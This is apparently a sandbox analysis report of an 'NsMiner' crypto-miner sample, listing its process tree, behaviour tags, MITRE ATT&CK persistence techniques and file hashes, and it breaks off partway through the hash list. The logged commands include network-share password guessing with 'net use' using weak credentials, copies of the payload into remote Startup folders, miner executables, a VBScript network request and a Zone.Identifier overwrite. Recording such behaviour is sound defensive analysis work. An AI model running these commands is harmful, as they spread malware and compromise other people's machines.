C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\C$\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\C$\1\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\1\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\Profiles\1\Start Menu\Programs\Startup\IMG001.exe"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\Windows\All Users\Start menu\Programs\Startup\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo f"4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" @ xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe" 1>nul && @ echo copy to "\\10.127.255.255\Users\1\IMG001.exe" "4⤵
-
C:\Windows\SysWOW64\xcopy.exexcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\10.127.255.255\Users\1\IMG001.exe"5⤵
- Enumerates system info in registry
-
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users /delete /y4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 20 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1602" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1602" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"1"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "10.127.255.255" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "10.127.255.255" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1602" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1602" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"10.127.255.255"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "administrator" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1602" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1602" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"administrator"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "123" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "123" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "user" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "user" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "1602" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "1602" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ """" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users """" /user:"user"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\C$ "0" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\net.exenet use \\10.127.255.255\Users "0" /user:"admin"4⤵
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 localhost4⤵
- Runs ping.exe
-
-
-
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\" -spe -an -ai#7zMap12215:122:7zEvent178581⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\makensis.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\makensis.exe"1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner32.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner32.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner64.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner64.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner64.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\NsCpuCNMiner64.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\pools.txt1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Stubs\bzip2~\" -spe -an -ai#7zMap16961:146:7zEvent110261⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Plugins\tftp.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Plugins\tftp.exe"1⤵
- Executes dropped EXE
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Plugins\info\" -spe -an -ai#7zMap3674:156:7zEvent190641⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Plugins\info\info.vbe"1⤵
- Checks computer location settings
-
C:\Windows\System32\cscript.exe"C:\Windows\System32\cscript.exe" "C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\Plugins\info\info.vbe"2⤵
- Blocklisted process makes network request
-
C:\Windows\System32\cmd.execmd /c (echo [ZoneTransfer] & echo ZoneId=0) > C:\Users\Admin\AppData\Local\Temp\tmp2.exe:Zone.Identifier3⤵
- NTFS ADS
-
-
C:\Windows\System32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\tmp2.exe3⤵
-
-
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\1712800611_log.txt1⤵
-
C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\makensis.exe"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$R9\makensis.exe"1⤵
- Executes dropped EXE
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$TEMP\info\" -spe -an -ai#7zMap30073:144:7zEvent164911⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\Notepad.exe"C:\Windows\System32\Notepad.exe" C:\Users\Admin\AppData\Local\Temp\gemme ya booty\IMG001\$TEMP\info\info.vbe1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\gemme ya booty\.htaccess2⤵
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD51cd7834fb975e468fccc8f027f69a528
SHA156275eef952e6559b86a2cba0b9d45b0307f9dae
SHA25672e847a89d6a5e9e779ea2f6347b8780c0c0d72969f43777aa7ceb431bd3b024
SHA51214e5fdc4ee4d961f1da2272847d31ddd1559a36415f00a032ae71400956d897dbd88fd8c8d03aadad29888e729d5c5077d8620aec8e179440b0d5dce511f3338
-
Filesize
1.4MB
MD53afeb8e9af02a33ff71bf2f6751cae3a
SHA1fd358cfe41c7aa3aa9e4cf62f832d8ae6baa8107
SHA256a0eba3fda0d7b22a5d694105ec700df7c7012ddc4ae611c3071ef858e2c69f08
SHA51211a2c12d7384d2743d25b9e28fc4ea0c3e2771aca92875fd3350f457df66c66827d175f67108f1a56d958f3b1163f3a89eedb8919bf7973d037241a1e59231d5
-
Filesize
34KB
MD57ac2315d458a6c78f81f7167b164ef37
SHA1f501956f346fe7ac49454f5eae54907eeb247f1d
SHA256a32a41c520aa1d08d8e5cbc18c1994f92d47bede5cb8d3aca761579d242d249d
SHA51200802299e1161ac3a3849678a0515e2ed4548a9c1397635fb546683a525f2dbaab8b90875d81821bc66b76c6669a309922284e818f510fb0d81d0c317458919b
-
Filesize
766B
MD54023b710d3b47d9101c27f5da22aa5ef
SHA1305c101062c424e728b393409ccf43d5295634a7
SHA256ba82bb5d90262417a18cec6631bbd8b880020eb159b45f264a9145196dfb8f3a
SHA51203ecea5fd46d4e9f79440a4ec5af3d27f1a60716e5579a1d38d684a1e42d1604fa6bed146eabf2fc2398d5898e67575cfde1ae0cbcd9c9a78c743f95eb366acc
-
Filesize
35KB
MD5346d3c8665f307a06aba85f8745360e8
SHA1de87ba7e2553f0efd531d30d6a5997dab9a6bc2f
SHA256c96383fe97a213140741bf5df71f322753200c094cb22db634e050d2be744a4f
SHA5126d9910251618226bfd94c94661b86db0b6c07d5dbc5445cbd0ae7bd34fc42e0b2af53fbd14b57969cda9deb747dae7837209eb4c61b4b130b0170f584b839aa2
-
Filesize
484KB
MD5e79833cb0d7b2573819ded2122b57bdd
SHA171ead8cd4a95704a0cade630bb3ce280af7e028e
SHA256572a6f9cb5b37b6eec13b578d346c2568ce3ec88bb711d75dac9e82fc01c8860
SHA5124b023e60392ead0691621a1306286fda6cdc4c447f164c8f249c59db2500d8b98514d93c7a7e8d3cfd60818d2ca74e84ec24163492765b6c17fe94ea0385bd69
-
Filesize
1KB
MD5e9ffdb716af3d355b25096a8ed4de8ef
SHA166e2b15ba4dbfa127c3ec86abce666870a4a168a
SHA25630daba44a4a25ff5750508613f897057a55337458f19b562e2ed1172c77e626b
SHA512f157dc99dfd4c1bec37deba85ed5250f70e169ab2d21b2c75d7d94b4463608c3c74ed9ab773e1359735cb95cb1f38333887d3c8e65c80c0cdfeee8bcb0d019f3
-
Filesize
1KB
MD58604e0f263922501f749cfca447b041a
SHA185c712bdeaceb78e2785e1f63811b0c4a50f952d
SHA25652ec3ba075a507e62bb6e3272fb13b30a8ddc0f62c4ea194311d558b338eb5ed
SHA512496d7a1b8b55d28387dad3f1c43e164bb567259c4cac21dd632ccd450dfbf28d431330c27ea72a5a8034979c325d19ff3fd8a3f7fc12b1122f67ef595630d5b2
-
Filesize
21KB
MD5d7a3fa6a6c738b4a3c40d5602af20b08
SHA134fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA25667eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA51275cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934
-
Filesize
92KB
MD5c9869112b8ea084c76f34dbba826f828
SHA1e209c404bb404ec87b0b1cfd4577999f0064eb25
SHA256bd2a4c80801303a763c0ed0ca329744fa4d514ecedd635703108c034a62a6cea
SHA512474c113a2bb7c544027fe6fc433bbeae9616098248af4a62a1e470daa54ec97b023e72ed2cdc2eddcfbd967525b44b57f9508ec8543892bed9ab0982d2491bdc
-
Filesize
31KB
MD5e3e1d287f6f2c33302cdb2cff4501e29
SHA1d5c343ed3558960a6ddb2f45a6fe40612a6d1c39
SHA256744d0aa29599e9ba651cd2dcab8b064c728804deecc3559a0d923f49350bf466
SHA512d5d8938c2ca9cadf295cf019f55c7e0a9e8160ea042f13f5d834e44c180e5d5a93a200ab0c55a74638036c0a90af881fc5473a17e184067405baa04e7b93d27d
-
Filesize
954B
MD56ec0fd69c9613a8c55af3cf14ae52921
SHA1a8db1fae03292a4c72426799fde0aaa066b36ca0
SHA256694e8acf63e014944e0d6563c3666fbcc2add0429dcdadf6a7336aa9c7968717
SHA512725cb5d738d228dbeddf6c907543f3a03ce29b857cb1724aad6d3437129611daad923337364489a314bcee9a7a89d2c82ddd9107dc444761a313f8cdf15924db
-
Filesize
954B
MD5a6f0d536fbe0e6ac919739998429112e
SHA184046254db498db943a9a9bfa40c6d6c243d9367
SHA2569fc76cf1b0677ea44d6015536eb3700de95adb36c0672d312e42f70bde3b16ac
SHA512ef0b8ae8711732e3d718c72a69e78b9ea6cb08bf6b5fca7fc7097450eed5a54d08c8da20288344ab037d1b3e3a44f751c579677e17813aba96f1881d5d582082
-
Filesize
954B
MD5b7a78f3d2f84249e16447a4c715ac043
SHA107bb69e7877de034a1b7d8f6a351cc65d0d97705
SHA2567b513e6713d6cc66a5c27306ec7e35153792f965954866385ab00d5819405815
SHA5123096d758d12d4ac8fa07af4d285af409034292dbeec758b3ed87d1b7eb2fbc13833527fd005a8109bdfad3c3f0c7c589bda13f5e3ad5a7f50687eba686391818
-
Filesize
3.4MB
MD5908bb37015af1c863e8e73bb76fdb127
SHA1da3c0542e7223d9a1caf327164a1d54597afa59b
